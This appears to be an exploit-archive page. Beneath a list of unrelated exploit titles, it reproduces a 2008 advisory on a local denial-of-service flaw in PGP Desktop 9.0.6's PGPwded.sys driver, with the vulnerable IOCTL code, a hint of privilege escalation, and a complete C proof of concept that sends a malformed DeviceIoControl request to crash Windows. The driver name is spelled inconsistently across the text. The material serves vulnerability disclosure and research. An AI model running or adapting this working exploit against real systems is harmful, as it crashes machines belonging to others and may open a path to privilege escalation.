477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
105 lines
3.1 KiB
PHP
Executable file
105 lines
3.1 KiB
PHP
Executable file
--------------------------[PGP Desktop 9.0.6 Denial Of Service]--------------->
|
|
|
|
|
|
Author: Giuseppe 'Evilcry' Bonfa'
|
|
E-Mail: evilcry {AT} GMAIL {DOT} COM
|
|
Profile: http://evilcry.netsons.org
|
|
Website: http://evilfingers.com/
|
|
|
|
Release Date: 23/12/2008
|
|
|
|
+-------------------------------------------------+
|
|
Product: PGP Desktop 9.0.6 [Build 6060] (other version could be affected)
|
|
Affected Component: PGPwded.sys
|
|
Category: Local Denial of Service (BSOD)
|
|
(untested) Local Privilege Escalation
|
|
+-------------------------------------------------+
|
|
|
|
|
|
|
|
--------------------------[Details]--------------->
|
|
|
|
PGP Desktop 's PGPweded.sys Driver does not sanitize user supplied input (IOCTL)
|
|
and this lead to a Driver Collapse that propagates on the system with a BSOD.
|
|
|
|
Affected IOCTL is 0x80022038
|
|
|
|
+-------------------------------------------------+
|
|
Device Type: Custom Device Type: 0x8002, 32770
|
|
Transfer Type: METHOD_BUFFERED (0x0, 0)
|
|
Access Type: FILE_ANY_ACCESS (0x0, 0)
|
|
Function Code: 0x80E, 2062
|
|
+-------------------------------------------------+
|
|
|
|
From Crash Dump Analysis we obtain a KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e),
|
|
could also exists the possibility of a Local Privilege Escalation, but I've not
|
|
checked it =)
|
|
|
|
+--------------------------------------------------------------------------------------------+
|
|
/* PGPwded.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC
|
|
*
|
|
* Author: Giuseppe 'Evilcry' Bonfa'
|
|
* E-Mail: evilcry {AT} gmail. {DOT} com
|
|
* Website: http://evilcry.netsons.org
|
|
*
|
|
*/
|
|
|
|
/*
|
|
Since we had publishing problems, we used spaces between escape < char and the include file as shown here: #include < windows.h >, to compile you have to delete the space.
|
|
|
|
*/
|
|
#include < windows.h >
|
|
#include < stdio.h >
|
|
#include < stdlib.h >
|
|
|
|
int main(void)
|
|
{
|
|
HANDLE hDevice;
|
|
DWORD Dummy;
|
|
|
|
system("cls");
|
|
printf("\n .:: PGP Enterprise DoS Proof of Concept ::.\n");
|
|
|
|
hDevice = CreateFileA("\\\\.\\PGPwdef",
|
|
0,
|
|
FILE_SHARE_READ | FILE_SHARE_WRITE,
|
|
NULL,
|
|
OPEN_EXISTING,
|
|
0,
|
|
NULL);
|
|
|
|
if (hDevice == INVALID_HANDLE_VALUE)
|
|
{
|
|
printf("\n Unable to Open PGPwded Device Driver\n");
|
|
return EXIT_FAILURE;
|
|
}
|
|
|
|
DeviceIoControl(hDevice, 0x80022038,(LPVOID) 0x80000001, 0, (LPVOID) 0x80000002, 0, &Dummy, (LPOVERLAPPED)NULL);
|
|
|
|
return EXIT_SUCCESS;
|
|
}
|
|
|
|
+--------------------------------------------------------------------------------------------+
|
|
|
|
|
|
|
|
Special Thanks:
|
|
To _g_ of orange-bat that developed IOCTL-Proxy a really effective IOCTL Fuzzer
|
|
http://www.orange-bat.com/code/ioctl-proxy.zip
|
|
|
|
|
|
|
|
Regards,
|
|
Giuseppe 'Evilcry' Bonfa'
|
|
|
|
|
|
|
|
Disclaimer:
|
|
The information in the advisory is believed to be accurate at the time of publishing based
|
|
on currently available information. Use of the information constitutes acceptance for use
|
|
in an AS IS condition. There is no representation or warranties, either express or implied
|
|
by or with respect to anything in this document, and shall not be liable for a ny implied
|
|
warranties of merchantability or fitness for a particular purpose or for any indirect special
|
|
or consequential damages.
|
|
|
|
# milw0rm.com [2008-12-23]
|